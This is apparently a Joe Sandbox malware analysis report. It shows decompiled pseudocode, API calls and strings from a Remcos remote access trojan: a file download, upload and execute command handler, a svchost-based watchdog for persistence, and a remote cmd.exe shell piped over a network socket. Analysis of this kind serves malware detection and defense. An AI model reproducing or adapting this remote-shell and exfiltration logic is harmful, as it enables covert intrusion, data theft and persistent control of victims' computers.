					L00402F73(0x46c238, _t630, L00402F73(0x46c238,  &_v212, L00402F73(0x46c238,  &_v260, L00402F97( &_v236, L00401E29( &_v292, _t564, __eflags, 1), 0x46c238), __eflags, _t239), __eflags, 0x46c238), __eflags, _t238);
					E00404A6E(0x46c238,  &_v140, _t243, __eflags);
					L00401FA7();
					L00401FA7();
					L00401FA7();
					E0040425F(0x46c238,  &_v292, L00401F75(L00401E29( &_v324, _t243, __eflags, 0)));
					_t252 = L00416C93( &_v272,  &_v296);
					_t631 = _t630 - 0x18;
					E004075C4(0x46c238, _t631, "Downloading file: ", _t618 - 0x10, __eflags, _t252);
					_t632 = _t631 - 0x14;
					E00402064(0x46c238, _t632, "[Info]");
					E004165D8(0x46c238, "[Info]");
					L00401FA7();
					L00401ED0();
					_t259 = L00401F75(L00401E29( &_v336, "Downloading file: ", __eflags, 0));
					_t634 = _t632 + 0x30 - 0x18;
					E0040425F(0x46c238, _t634, _t259);
					_t264 = E0040628B( &_v192, __eflags, E004391B0(_t261, L00401F75(L00401E29( &_v344, "Downloading file: ", __eflags, 4)), 0, 0xa), "Downloading file: ", 0x56);
					_t636 = _t634 + 0x2c;
					__eflags = _t264;
					if(__eflags == 0) {
						E0040425F(0x46c238,  &_v264, L00401F75(L00401E29( &_v296, "Downloading file: ", __eflags, 0)));
						_t268 = L00416C93( &_v244,  &_v268);
						_t564 = "Failed to download file: ";
						E004075C4(0x46c238, _t636 - 0x18, "Failed to download file: ", "[Info]", __eflags, _t268);
						E00402064(0x46c238, _t636 - 4, "[ERROR]");
						E004165D8(0x46c238, "[Info]");
						L00401FA7();
						L00401ED0();
					} else {
						E004075C4(0x46c238, _t636 - 0x18, "Downloaded file size: ", "[Info]", __eflags, L00416B7E(0x46c238,  &_v236, E00402469()));
						E00402064(0x46c238, _t636 - 4, "[DEBUG]");
						E004165D8(0x46c238, "[Info]");
						L00401FA7();
						E0040425F(0x46c238,  &_v268, L00401F75(L00401E29( &_v300, "Downloaded file size: ", __eflags, 0)));
						_t286 = L00416C93( &_v248,  &_v272);
						_t564 = "Downloaded file: ";
						E004075C4(0x46c238, _t636 - 4 + 0x30 - 0x18, "Downloaded file: ", "[Info]", __eflags, _t286);
						E00402064(0x46c238, _t636 - 4 + 0x30 - 4, "[Info]");
						E004165D8(0x46c238, "[Info]");
						L00401FA7();
						L00401ED0();
						E00402064(0x46c238, _t636 - 4 + 0x30 - 4 + 0x30 - 0x18, 0x45f6ac);
						_push(0x58);
						E00404A6E(0x46c238,  &_v160, "Downloaded file: ", __eflags);
					}
					L00404DD5( &_v140);
					L00404DF9(0x46c238,  &_v140, 0);
					L15:
					L00401FA7();
					goto L41;
				}
				_t604 = _t591 - 0x61;
				if(_t604 == 0) {
					E0040425F(0x46c238, _t618 - 0x18, L00401F75(L00401E29( &_v264, _t564, __eflags, 0)));
					_t297 = L00401E29( &_v272, _t564, __eflags, 2);
					_t298 = L00401E29( &_v276, _t564, __eflags, 1);
					_t564 = _t297;
					E0041636B(_t298, _t297);
					goto L41;
				}
				_t606 = _t604 - 0x26;
				if(_t606 == 0) {
					GetLogicalDriveStringsA(0x64,  &_v108);
					E0040208B(0x46c238,  &_v252, _t564, __eflags,  &_v108, 0x64);
					__eflags = E00407399( &_v260, 0x45f850, 0, 2) + 1;
					L00401F64(E00407399( &_v260, 0x45f850, 0, 2) + 1);
					E004020CC(0x46c238, _t618 - 0x18, _t564, E00407399( &_v260, 0x45f850, 0, 2) + 1,  &_v276);
					_t309 = E004063B9(0x46c238,  &_v256);
					_t564 = L00402F97( &_v208,  &_v280, 0x46c238);
					L00402EFD(_t618 - 0x18, _t310, _t309);
					_push(0x51);
					E00404A6E(0x46c238, 0x46c2e8, _t310, __eflags);
					L00401FA7();
					L00401FA7();
					goto L15;
				}
				_t608 = _t606 - 1;
				if(_t608 == 0) {
					E0040425F(0x46c238,  &_v256, L00401F75(L00401E29( &_v264, _t564, __eflags, 0)));
					E00407352(0x46c238, _t618 - 0x18, _t564, __eflags,  &_v260);
					E00406176();
					__eflags = E00402469() - 2;
					_t325 = L00416C93( &_v204, E0040730B( &_v264,  &_v240, 0, E00402469() - 2));
					_t564 = "Browsing directory: ";
					E004075C4(0x46c238, _t618 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t585, E00402469() - 2, _t325);
					E00402064(0x46c238, _t618 - 0x18 + 0x18 - 4, "[Info]");
					E004165D8(0x46c238, _t585);
					L00401FA7();
					goto L13;
				}
				_t610 = _t608 - 1;
				if(_t610 == 0) {
					E0040425F(0x46c238,  &_v256, L00401F75(L00401E29( &_v264, _t564, __eflags, 0)));
					ShellExecuteW(0, L"open", L00401ECB( &_v260), 0, 0, 1);
					_t335 = L00416C93( &_v188,  &_v260);
					_t564 = "Executing file: ";
					E004075C4(0x46c238, _t618 - 0x18, "Executing file: ", _t585, __eflags, _t335);
					E00402064(0x46c238, _t618 - 4, "[Info]");
					E004165D8(0x46c238, _t585);
					L00401FA7();
					goto L40;
				} else {
					_t612 = _t610 - 1;
					_t671 = _t612;
					if(_t612 == 0) {
						E004072F8( &_v108);
						_t341 = L00401E29( &_v264, _t564, _t671, 3);
						_t658 = _t618 - 0x18;
						E004020CC(0x46c238, _t658, _t564, _t671, _t341);
						_t343 = L00401E29( &_v272, _t564, _t671, 2);
						_t659 = _t658 - 0x18;
						E004020CC(0x46c238, _t659, _t564, _t671, _t343);
						_t345 = L00401E29( &_v280, _t564, _t671, 1);
						_t660 = _t659 - 0x18;
						E004020CC(0x46c238, _t660, _t564, _t671, _t345);
						_push(L00401F75(L00401E29( &_v288, _t564, _t671, _t612)));
						_t349 = E00406455( &_v136, _t564);
						_push(_t612);
						_t672 = _t349;
						if(_t349 == 0) {
							E0040425F(0x46c238,  &_v252, L00401F75(L00401E29( &_v368, _t564, __eflags)));
							_t353 = L00416C93( &_v208,  &_v256);
							_t661 = _t660 - 0x18;
							_t564 = "Failed to upload file: ";
							E004075C4(0x46c238, _t661, "Failed to upload file: ", _t585, __eflags, _t353);
							_t556 = _t661 - 0x14;
							_push("[ERROR]");
						} else {
							E0040425F(0x46c238,  &_v252, L00401F75(L00401E29( &_v368, _t564, _t672)));
							_t363 = L00416C93( &_v208,  &_v256);
							_t664 = _t660 - 0x18;
							_t564 = "Uploaded file: ";
							E004075C4(0x46c238, _t664, "Uploaded file: ", _t585, _t672, _t363);
							_t556 = _t664 - 0x14;
							_push("[Info]");
						}
						E00402064(0x46c238, _t556);
						E004165D8(0x46c238, _t585);
						L00401FA7();
						L00401ED0();
						L00407306(0x46c238,  &_v132, _t612);
					}
					goto L41;
				}
			}

0x00406930
0x00406930
0x00406940
0x00406942
0x00406945
0x0040694a
0x00406952
0x0040696c
0x00406976
0x0040697b
0x00406986
0x0040698b
0x00406998
0x004069a1
0x004069ab
0x004069ae
0x004069b0
0x00406faf
0x00406faf
0x00406fb5
0x0040719a
0x004071a9
0x004071b3
0x004071b5
0x004071cb
0x004071b7
0x004071be
0x004071be
0x004071d1
0x004071da
0x004071dc
0x00407203
0x00407208
0x0040720d
0x00407214
0x00407221
0x00407226
0x00407229
0x00407231
0x00407236
0x00407239
0x0040723b
0x004071de
0x004071e2
0x004071e7
0x004071ea
0x004071f2
0x004071f7
0x004071fa
0x004071fc
0x004071fc
0x00407240
0x00407245
0x0040724a
0x00407251
0x0040725c
0x00407261
0x00407266
0x00407268
0x0040726d
0x0040726f
0x004072c6
0x004072ca
0x004072cf
0x004072d3
0x004072df
0x004072e8
0x004072f5
0x00407271
0x0040727c
0x00407282
0x00407289
0x0040729c
0x004072a5
0x004072b9
0x004072be
0x004072be
0x00000000
0x004072c3
0x0040726f
0x00406fbb
0x00406fbb
0x00406fbe
0x00407099
0x004070b5
0x004070d1
0x004070eb
0x004070fb
0x0040710a
0x0040710c
0x00407111
0x00407111
0x00407114
0x00407152
0x00407156
0x0040715c
0x00407163
0x0040716c
0x00407116
0x00407119
0x00407124
0x0040712a
0x0040712f
0x00407175
0x00406c12
0x00406c12
0x00000000
0x00406c12
0x00406fc4
0x00406fc4
0x00406fc7
0x00407024
0x00407037
0x0040703d
0x00407053
0x0040705d
0x00407068
0x00407077
0x00000000
0x00407077
0x00406fc9
0x00406fc9
0x00406fcc
0x00406fe4
0x00406ffe
0x00407002
0x00407002
0x00000000
0x00406fcc
0x004069b6
0x00406d09
0x00406d17
0x00406d2d
0x00406d2e
0x00406d2f
0x00406d30
0x00406d31
0x00406d3c
0x00406d41
0x00406d4e
0x00406d8b
0x00406d9a
0x00406da3
0x00406dac
0x00406db5
0x00406dd2
0x00406ddf
0x00406de4
0x00406def
0x00406df4
0x00406dff
0x00406e04
0x00406e10
0x00406e19
0x00406e2a
0x00406e2f
0x00406e35
0x00406e61
0x00406e66
0x00406e69
0x00406e6b
0x00406f47
0x00406f54
0x00406f5c
0x00406f64
0x00406f73
0x00406f78
0x00406f84
0x00406f8d
0x00406e71
0x00406e90
0x00406e9f
0x00406ea4
0x00406eb0
0x00406ecb
0x00406ed8
0x00406ee0
0x00406ee8
0x00406ef3
0x00406ef8
0x00406f04
0x00406f0d
0x00406f1c
0x00406f21
0x00406f2a
0x00406f2a
0x00406f99
0x00406fa5
0x00406cb1
0x00406cb5
0x00000000
0x00406cb5
0x004069bc
0x004069bf
0x00406cd7
0x00406ce2
0x00406cef
0x00406cf4
0x00406cf8
0x00000000
0x00406cfd
0x004069c5
0x004069c8
0x00406c26
0x00406c3a
0x00406c51
0x00406c57
0x00406c66
0x00406c6f
0x00406c89
0x00406c8d
0x00406c93
0x00406c9a
0x00406ca3
0x00406cac
0x00000000
0x00406cac
0x004069ce
0x004069d1
0x00406b9b
0x00406baa
0x00406baf
0x00406bc0
0x00406bd9
0x00406be1
0x00406be9
0x00406bf8
0x00406bfd
0x00406c09
0x00000000
0x00406c0e
0x004069d7
0x004069da
0x00406b22
0x00406b3b
0x00406b49
0x00406b51
0x00406b59
0x00406b68
0x00406b6d
0x00406b79
0x00000000
0x004069e0
0x004069e0
0x004069e0
0x004069e3
0x004069f0
0x004069fb
0x00406a00
0x00406a06
0x00406a11
0x00406a16
0x00406a1c
0x00406a27
0x00406a2c
0x00406a32
0x00406a48
0x00406a50
0x00406a59
0x00406a5a
0x00406a5c
0x00406aae
0x00406abb
0x00406ac0
0x00406ac3
0x00406acb
0x00406ad3
0x00406ad5
0x00406a5e
0x00406a6f
0x00406a7c
0x00406a81
0x00406a84
0x00406a8c
0x00406a94
0x00406a96
0x00406a96
0x00406ada
0x00406adf
0x00406aeb
0x00406af4
0x00406b00
0x00406b00
0x00000000
0x004069e3

APIs

SetEvent.KERNEL32(?,?), ref: 00406952
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406B3B

Part of subcall function 00406455: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064A0

Part of subcall function 0040628B: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,[Info],00000000,0046C238,?,00406E66,00000000), ref: 004062E4
Part of subcall function 0040628B: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,fn@,?,00406E66,00000000,?,?,0000000A,00000000), ref: 0040632C
Part of subcall function 0040628B: CloseHandle.KERNEL32(00000000,?,00406E66,00000000,?,?,0000000A,00000000), ref: 00406366
Part of subcall function 0040628B: MoveFileW.KERNEL32(00000000,00000000), ref: 0040637E

Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2

Part of subcall function 00404A6E: send.WS2_32 ref: 00404AE2

Part of subcall function 00407516: char_traits.LIBCPMT ref: 00407531

GetLogicalDriveStringsA.KERNEL32 ref: 00406C26
StrToIntA.SHLWAPI(00000000,?), ref: 00406FE4
CreateDirectoryW.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 00407053

Part of subcall function 00406176: FindFirstFileW.KERNEL32(00000000,?,?,0046C238), ref: 00406191

Strings

Downloaded file: , xrefs: 00406EE0
Failed to download file: , xrefs: 00406F5C
Uploaded file: , xrefs: 00406A84
Downloaded file size: , xrefs: 00406E88
Failed to upload file: , xrefs: 00406AC3
Unable to rename file!, xrefs: 0040713D
Executing file: , xrefs: 00406B51
[DEBUG], xrefs: 00406E9A
[ERROR], xrefs: 00406AD5, 00406F6E, 0040723B
Downloading file: , xrefs: 00406DE7
Browsing directory: , xrefs: 00406BE1
[Info], xrefs: 00406A96, 00406B63, 00406BF3, 00406DF7, 00406DFE, 00406EF2, 004071FC
open, xrefs: 00406B35
Deleted file: , xrefs: 004071EA
Unable to delete: , xrefs: 00407229

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: File$Create$CloseDirectoryDriveEventExecuteFindFirstHandleLocalLogicalMoveShellStringsTimeWritechar_traitssend
String ID: Browsing directory: $Deleted file: $Downloaded file size: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[DEBUG]$[ERROR]$[Info]$open
API String ID: 4189642951-3341346664
Opcode ID: b23bdb48348f30ee9ac4e1146e4252e962e37f2be8bac0de87d1724990a750ec
Instruction ID: 825834acea58237ea27b8ef3a258c04868925692b220403c8df577372deca8be
Opcode Fuzzy Hash: b23bdb48348f30ee9ac4e1146e4252e962e37f2be8bac0de87d1724990a750ec
Instruction Fuzzy Hash: 43326471A143016BC604FB76C866DAF77659F91348F40093FF942671E2EE3CAA09C69B

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4B7, Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 194
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040F4B7(void* __eflags) {
				char _v28;
				char _v36;
				void* _v40;
				char _v56;
				void* _v64;
				char _v76;
				char _v84;
				void* _v88;
				char _v100;
				char _v104;
				void* _v108;
				char _v124;
				char _v128;
				long _v132;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t26;
				void* _t29;
				void* _t35;
				void* _t46;
				void* _t61;
				void* _t78;
				void* _t107;
				long _t112;
				long _t141;
				void* _t142;
				CHAR* _t143;
				void* _t145;
				signed int _t147;
				void* _t149;
				void* _t155;

				_t149 = (_t147 & 0xfffffff8) - 0x7c;
				_push(_t142);
				_t26 = GetCurrentProcessId();
				if(E004105A0(0x46c518, L00401F75(0x46c518), "WD", _t26) != 0) {
					_t29 = OpenMutexA(0x100000, 0, "Mutex_RemWatchdog");
					__eflags = _t29;
					if(_t29 == 0) {
						E004020B5(0x46c518,  &_v100);
						E00417334(L00401ECB(0x46c500),  &_v100);
						L00401F4D(0x46c518,  &_v124);
						__eflags = L00416F6C( &_v124);
						if(__eflags != 0) {
							_t35 = E0040425F(0x46c518,  &_v76, L"\\SysWOW64");
							L00401EDA( &_v132, _t37, _t142, E00403010( &_v36, E0040425F(0x46c518,  &_v56, E0043918F(0x46c518,  &_v76, __eflags, L"WinDir")), _t35));
							L00401ED0();
							L00401ED0();
						} else {
							_t61 = E0040425F(0x46c518,  &_v28, L"\\system32");
							L00401EDA( &_v132, _t63, _t142, E00403010( &_v84, E0040425F(0x46c518,  &_v56, E0043918F(0x46c518,  &_v28, __eflags, L"WinDir")), _t61));
							L00401ED0();
							L00401ED0();
						}
						L00401ED0();
						E0040766E(0x46c518,  &_v124, 0, L"\\svchost.exe");
						_t143 = L00401F75( &_v104);
						_t46 = E00413ACA(L00401ECB( &_v128), _t143, 0x46bd50);
						_t150 = _t149 - 0x18;
						_t107 = _t149 - 0x18;
						__eflags = _t46;
						if(_t46 != 0) {
							E00402064(0x46c518, _t107, "Watchdog module activated");
							E00402064(0x46c518, _t150 - 0x18, "[Info]");
							E004165D8(0x46c518, 0);
							Sleep(0x7d0);
							_t112 =  *0x46bd58; // 0x0
							goto L13;
						}
						E00402064(0x46c518, _t107, "Watchdog launch failed!");
						E00402064(0x46c518, _t150 - 0x18, "[ERROR]");
						E004165D8(0x46c518, 0);
						CloseHandle( *0x46bd60);
						L00401ED0();
						L00401FA7();
						_push(3);
						_pop(1);
					} else {
						CloseHandle(_t29);
						_t155 = _t149 - 0x18;
						E00402064(0x46c518, _t155, "Remcos restarted by watchdog!");
						_t156 = _t155 - 0x18;
						E00402064(0x46c518, _t155 - 0x18, "[Info]");
						E004165D8(0x46c518, 0);
						E00402064(0x46c518, _t156 + 0x18, "Watchdog module activated");
						E00402064(0x46c518, _t156 + 0x18 - 0x18, "[Info]");
						E004165D8(0x46c518, 0);
						CreateThread(0, 0, E0040FAE9, 0, 0, 0);
						_t143 = "WDH";
						_t78 = E00410275(L00401F75(0x46c518), _t143,  &_v148);
						__eflags = _t78;
						if(_t78 == 0) {
							goto L1;
						} else {
							 *0x46bd50 = OpenProcess(0x1fffff, 0, _v132);
							E004106D2(L00401F75(0x46c518), __eflags, _t143);
							_t112 = _v132;
							L13:
							L14();
							asm("int3");
							_push(_t143);
							_push(0);
							_t141 = _t112;
							L15:
							_t145 = OpenProcess(0x100000, 0, _t141);
							WaitForSingleObject(_t145, 0xffffffff);
							CloseHandle(_t145);
							__eflags =  *0x46bd4e;
							if(__eflags != 0) {
								E0040F4B7(__eflags, 0);
							}
							goto L15;
						}
						L17:
					}
				} else {
					L1:
				}
				return 1;
				goto L17;
			}

0x0040f4bd
0x0040f4c1
0x0040f4c3
0x0040f4e6
0x0040f4fd
0x0040f503
0x0040f505
0x0040f594
0x0040f5a9
0x0040f5b2
0x0040f5bc
0x0040f5be
0x0040f61b
0x0040f647
0x0040f650
0x0040f659
0x0040f5c0
0x0040f5c9
0x0040f5f5
0x0040f5fe
0x0040f607
0x0040f60c
0x0040f662
0x0040f670
0x0040f687
0x0040f692
0x0040f698
0x0040f69b
0x0040f69d
0x0040f69f
0x0040f6a6
0x0040f6b5
0x0040f6ba
0x0040f6c7
0x0040f6cd
0x00000000
0x0040f6cd
0x0040f6da
0x0040f6e9
0x0040f6ee
0x0040f6fc
0x0040f706
0x0040f70f
0x0040f714
0x0040f716
0x0040f50b
0x0040f50c
0x0040f512
0x0040f51c
0x0040f521
0x0040f52c
0x0040f531
0x0040f540
0x0040f54b
0x0040f550
0x0040f562
0x0040f56c
0x0040f57c
0x0040f583
0x0040f585
0x00000000
0x0040f58b
0x0040f733
0x0040f73f
0x0040f745
0x0040f749
0x0040f749
0x0040f74e
0x0040f74f
0x0040f750
0x0040f751
0x0040f753
0x0040f761
0x0040f766
0x0040f76d
0x0040f773
0x0040f77a
0x0040f77e
0x0040f77e
0x00000000
0x0040f77a
0x00000000
0x0040f585
0x0040f4e8
0x0040f4e8
0x0040f4ea
0x0040f71d
0x00000000

APIs

GetCurrentProcessId.KERNEL32 ref: 0040F4C3

Part of subcall function 004105A0: RegCreateKeyA.ADVAPI32 ref: 004105AE
Part of subcall function 004105A0: RegSetValueExA.ADVAPI32(?,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040AA06,0045FF08,00000001,000000AF,Function_0005F6AC), ref: 004105C9
Part of subcall function 004105A0: RegCloseKey.ADVAPI32(?,?,?,?,0040AA06,0045FF08,00000001,000000AF,Function_0005F6AC), ref: 004105D4

OpenMutexA.KERNEL32 ref: 0040F4FD
CloseHandle.KERNEL32(00000000), ref: 0040F50C
CreateThread.KERNEL32 ref: 0040F562
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040F72A

Strings

Mutex_RemWatchdog, xrefs: 0040F4F0
\svchost.exe, xrefs: 0040F667
Watchdog module activated, xrefs: 0040F53B, 0040F6A1
[ERROR], xrefs: 0040F6E4
WinDir, xrefs: 0040F5CF, 0040F621
\SysWOW64, xrefs: 0040F612
\system32, xrefs: 0040F5C0
[Info], xrefs: 0040F524, 0040F52B, 0040F54A, 0040F6B0
Remcos restarted by watchdog!, xrefs: 0040F517
WDH, xrefs: 0040F56C, 0040F572, 0040F730
Watchdog launch failed!, xrefs: 0040F6D5

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: Mutex_RemWatchdog$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[Info]$\SysWOW64$\svchost.exe$\system32
API String ID: 3018269243-3797382479
Opcode ID: ca2db2409f848aab60e863afa08f20be2026d18430725eff97ea998b1277679e
Instruction ID: 06e747cae4c44867ce0b5dbd908e93f043d73082a9d6ea5748c6826fd798d0d4
Opcode Fuzzy Hash: ca2db2409f848aab60e863afa08f20be2026d18430725eff97ea998b1277679e
Instruction Fuzzy Hash: 6751ED316043006BC618FB72DD1B86F77659E90759F50083FF942731E2EE789A0986AF

Uniqueness

Uniqueness Score: -1.00%

Function 0040559D, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 283
pipesleepfileCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040559D(char _a4) {
				long _v8;
				long _v12;
				long _v16;
				char _v40;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t52;
				void* _t56;
				void* _t66;
				void* _t70;
				void* _t79;
				CHAR* _t80;
				int _t98;
				intOrPtr* _t107;
				intOrPtr _t138;
				signed int _t146;
				signed int _t147;
				long _t151;
				void* _t155;
				intOrPtr* _t156;
				void* _t163;
				void* _t168;
				void* _t175;

				_t156 = _t155 - 0x3c;
				_push(_t146);
				_t138 =  *((intOrPtr*)( *[fs:0x2c]));
				_t147 = _t146 | 0xffffffff;
				_t98 = 0;
				if( *0x46dcd0 >  *((intOrPtr*)(_t138 + 4))) {
					E0042EA6C(0x46dcd0);
					_t160 =  *0x46dcd0 - _t147;
					if( *0x46dcd0 == _t147) {
						E00404818(0, 0x46dc48, 0);
						L0042EDF6(_t160, E00452023);
						 *_t156 = 0x46dcd0;
						E0042EA2D(_t147);
					}
				}
				if( *0x46dcb0 >  *((intOrPtr*)(_t138 + 4))) {
					E0042EA6C(0x46dcb0);
					_t162 =  *0x46dcb0 - _t147;
					if( *0x46dcb0 == _t147) {
						E004020B5(_t98, 0x46dcd8);
						L0042EDF6(_t162, E00452019);
						E0042EA2D(_t147, 0x46dcb0);
					}
				}
				_t100 =  &_v40;
				E004020B5(_t98,  &_v40);
				_t139 = 0x46c2d0;
				_v8 = _t98;
				_t163 =  *0x46bae2 - _t98; // 0x0
				if(_t163 != 0) {
					L12:
					_v12 = _t98;
					PeekNamedPipe( *0x46dcb8, _t98, _t98, _t98,  &_v12, _t98);
					if(_v12 <= _t98) {
						_t156 = _t156 - 0x18;
						E00402064(_t98, _t156, 0x45f6ac);
						_push(0x62);
						_t147 = E00404A6E(_t98, 0x46dc48, _t136, __eflags);
						goto L21;
					}
					_push(_v12);
					_t56 = L00438E06(_t100);
					_t140 = _t56;
					ReadFile( *0x46dcb8, _t56, _v12,  &_v16, _t98);
					if(_v16 <= _t98) {
						L19:
						L00438E01(_t140);
						_t139 = 0x46c2d0;
						goto L21;
					}
					if(_v8 <= _t98) {
						L17:
						E00402064(_t98,  &_v64, _t140);
						_t156 = _t156 - 0x18;
						_t107 = _t156;
						_push(_v16);
						_push(_t98);
						L18:
						E004059C7(_t98, _t107, _t136, _t172);
						_t147 = E00404A6E(_t98, 0x46dc48, _t136, _t172, 0x62,  &_v64);
						L00401FA7();
						goto L19;
					}
					_t66 = L00438E20(_t140, L00401F75( &_v40), _v8);
					_t156 = _t156 + 0xc;
					_t172 = _t66;
					if(_t66 != 0) {
						goto L17;
					}
					E00402064(_t98,  &_v64, _t140);
					_t156 = _t156 - 0x18;
					_t107 = _t156;
					_push(_v16 - _v8);
					_push(_v8);
					goto L18;
				} else {
					_t136 = "cmd.exe";
					_t70 = E00405A22("cmd.exe");
					_t164 = _t70;
					if(_t70 == 0) {
						L26:
						L00404DD5(0x46dc48);
						CloseHandle( *0x46dcb8);
						CloseHandle( *0x46dcd4);
						 *0x46bae2 = _t98;
						_t98 = 1;
						L27:
						L00401FA7();
						L00401FA7();
						return _t98;
					}
					E004059BE(_t98, 0x46dcd8, E0043919A(_t98, _t164, "SystemDrive"));
					E004059B5(_t98, 0x46dcd8, 0x46c2d0, "\\");
					0x46dbf0->nLength = 0xc;
					 *0x46dbf8 = 1;
					 *0x46dbf4 = _t98;
					if(CreatePipe(0x46dccc, 0x46dcb4, 0x46dbf0, _t98) == 0 || CreatePipe(0x46dcb8, 0x46dcd4, 0x46dbf0, _t98) == 0) {
						goto L27;
					} else {
						_t151 = 0x44;
						E00431810(0x46dc00, 0x46dc00, _t98, CreatePipe);
						0x46dc00->cb = _t151;
						 *0x46dc2c = 0x101;
						 *0x46dc30 = 0;
						 *0x46dc38 =  *0x46dccc;
						_t79 =  *0x46dcd4;
						 *0x46dc3c = _t79;
						 *0x46dc40 = _t79;
						_t80 = L00401F75(0x46dcd8);
						 *0x46bae2 = CreateProcessA(_t98, L00401F75(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc00, 0x46dcbc) != 0;
						E004059BE(_t98, 0x46c2d0, 0x45f6ac);
						 *0x46bae3 = 1;
						E00404955(0x46dc48);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E004049D2("cmd.exe");
						_t156 = _t156 + 0xc - 0xfffffffffffffff8;
						E004020CC(_t98, _t156, "cmd.exe", CreateProcessA(_t98, L00401F75(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc00, 0x46dcbc),  &_a4);
						_push(0x93);
						_t100 = 0x46dc48;
						_t147 = E00404A6E(_t98, 0x46dc48, "cmd.exe", CreateProcessA(_t98, L00401F75(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc00, 0x46dcbc));
						Sleep(0x12c);
						_t168 =  *0x46bae2 - _t98; // 0x0
						if(_t168 == 0) {
							goto L26;
						}
						_t139 = 0x46c2d0;
						do {
							goto L12;
							L21:
							_t38 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
							_t100 = _t139;
							 *0x46bae3 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
							if(E00402469() == 0) {
								_v8 = _t98;
							} else {
								E004059B5(_t98, _t139, _t139, "\n");
								L00401F8D( &_v40, _t139);
								_t52 = E00402469();
								WriteFile( *0x46dcb4, L00401F75(_t139), _t52,  &_v8, _t98);
								_t100 = _t139;
								E004059BE(_t98, _t139, 0x45f6ac);
							}
							Sleep(0x64);
							_t175 =  *0x46bae3 - _t98; // 0x0
						} while (_t175 != 0);
						TerminateProcess(0x46dcbc->hProcess, _t98);
						CloseHandle( *0x46dcc0);
						CloseHandle( *0x46dcbc);
						goto L26;
					}
				}
			}

0x004055a6
0x004055aa
0x004055ac
0x004055ae
0x004055b6
0x004055be
0x004055c5
0x004055cb
0x004055d1
0x004055d9
0x004055e3
0x004055e8
0x004055ef
0x004055f4
0x004055d1
0x00405600
0x00405608
0x0040560e
0x00405614
0x0040561b
0x00405625
0x0040562c
0x00405631
0x00405614
0x00405632
0x00405635
0x0040563a
0x0040563f
0x00405642
0x00405648
0x004057be
0x004057c2
0x004057cf
0x004057d8
0x0040587a
0x00405884
0x00405889
0x00405895
0x00000000
0x00405895
0x004057de
0x004057e1
0x004057e8
0x004057f8
0x00405801
0x0040586c
0x0040586d
0x00405873
0x00000000
0x00405873
0x00405806
0x0040583b
0x0040583f
0x00405844
0x00405847
0x00405849
0x0040584c
0x0040584d
0x00405851
0x00405865
0x00405867
0x00000000
0x00405867
0x00405815
0x0040581a
0x0040581d
0x0040581f
0x00000000
0x00000000
0x00405825
0x00405830
0x00405833
0x00405835
0x00405836
0x00000000
0x0040564e
0x0040564e
0x00405655
0x0040565a
0x0040565c
0x00405935
0x0040593a
0x00405945
0x00405951
0x00405957
0x0040595d
0x0040595f
0x00405962
0x0040596a
0x00405977
0x00405977
0x00405675
0x00405681
0x0040569d
0x004056a7
0x004056b1
0x004056bb
0x00000000
0x004056d7
0x004056d9
0x004056e2
0x004056ea
0x004056f2
0x004056fc
0x00405711
0x00405716
0x0040571c
0x00405721
0x00405726
0x0040574f
0x00405756
0x00405760
0x00405767
0x00405776
0x00405777
0x00405778
0x00405779
0x00405781
0x00405786
0x0040578f
0x00405794
0x00405799
0x004057a5
0x004057a7
0x004057ad
0x004057b3
0x00000000
0x00000000
0x004057b9
0x004057be
0x00000000
0x00405897
0x004058a2
0x004058a5
0x004058a7
0x004058b3
0x004058f9
0x004058b5
0x004058bc
0x004058c5
0x004058d1
0x004058e5
0x004058f0
0x004058f2
0x004058f2
0x004058fe
0x00405904
0x00405904
0x00405917
0x00405923
0x0040592f
0x00000000
0x0040592f
0x004056bb

APIs

__Init_thread_footer.LIBCMT ref: 004055EF

Part of subcall function 00404A6E: send.WS2_32 ref: 00404AE2

__Init_thread_footer.LIBCMT ref: 0040562C
CreatePipe.KERNEL32(0046DCCC,0046DCB4,0046DBF0,00000000,0045F6C4,00000000), ref: 004056B7
CreatePipe.KERNEL32(0046DCB8,0046DCD4,0046DBF0,00000000), ref: 004056CD
CreateProcessA.KERNEL32 ref: 00405740
Sleep.KERNEL32(0000012C,00000093,?), ref: 004057A7
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004057CF
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004057F8

